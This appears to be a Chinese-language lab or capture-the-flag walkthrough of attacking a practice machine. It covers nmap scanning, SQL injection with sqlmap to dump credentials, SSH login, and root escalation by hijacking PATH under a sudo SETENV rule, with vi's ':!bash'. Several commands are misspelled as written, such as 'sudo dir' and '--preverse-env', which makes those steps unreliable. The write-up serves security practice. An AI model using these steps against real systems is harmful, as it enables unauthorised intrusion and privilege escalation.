主機發現

sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports

sudo nmap -sT -sC -sV -O -p22,8080 192.168.28.3 -oA nmapscan/detail

sudo nmap -sU --top-ports 20 192.168.28.3　-oA nmapscan/udp

(相關資料圖)

sudo nmap --script=vuln -p22,8080 192.168.28.3 -oA nmapscan/vuln

訪問http網頁

同時進行爆破目錄

sudo dir -u http://xx -w xx

訪問網頁時必須要讀全todolist,根據開發習慣和交互行問推斷技術和可能的漏洞

根據提示不斷點擊發現一個具有數字id的提示

利用這個進行sqlmap跑看看能否跑出

sudo sqlmap -u http://xx.xx.xx.xx:8080/mercuryfacts/1 --dbms mysql --dbs --batch#跑出數據庫

獲得用戶密碼

發現賬戶密碼嘗試ssh登錄

ssh@xx.xx.xx.xx

成功getshell

權限查看

whoami　　uname -a　　lsb_release -a(內核版本)　　ip a　　sudo -l　　cat /etc/crontab

查看家目錄是否有flag同時發現一個目錄

進入此目錄并查看txt發現了賬號和base64加密的密碼對linuxmaster賬戶的密碼進行解密

切換的linuxmaster用戶

su linuxmaster　　xx

查看whoami　　ip a　　　sudo -l　　cat /etc/crontab

sudo -l

利用root賬號需要設置一個環境變量才能執行check_syslog.sh這個腳本

查看check_syslog.sh的腳本

可以發現是tail命令運行

通過路徑優先查找的方式進行提權

1.用戶家目錄設置軟連接

ln -s /bin/vi tail

2.將當前路徑設置為環境變量

export PATH=.:$PATH

#驗證

echo $PATH

3.根據SETENV設置環境變量并執行腳本

sudo --preserver-env=PATH /usr/bin/check_syslog.sh

sudo的SETENV標記表示允許用戶設置環境變量，而--preserve-env選項表示保留當前環境變量并傳遞給執行的命令

sudo --preverse-env=PATH /usr/bin/check_syslog.sh

成功執行了腳本,因為tail在環境變量中指向的時/bin/vi所以成功打開了一個vi界面

在vi界面進行提權的語句時 :!bash

成功提權

關鍵詞：

責任編輯：Rex_04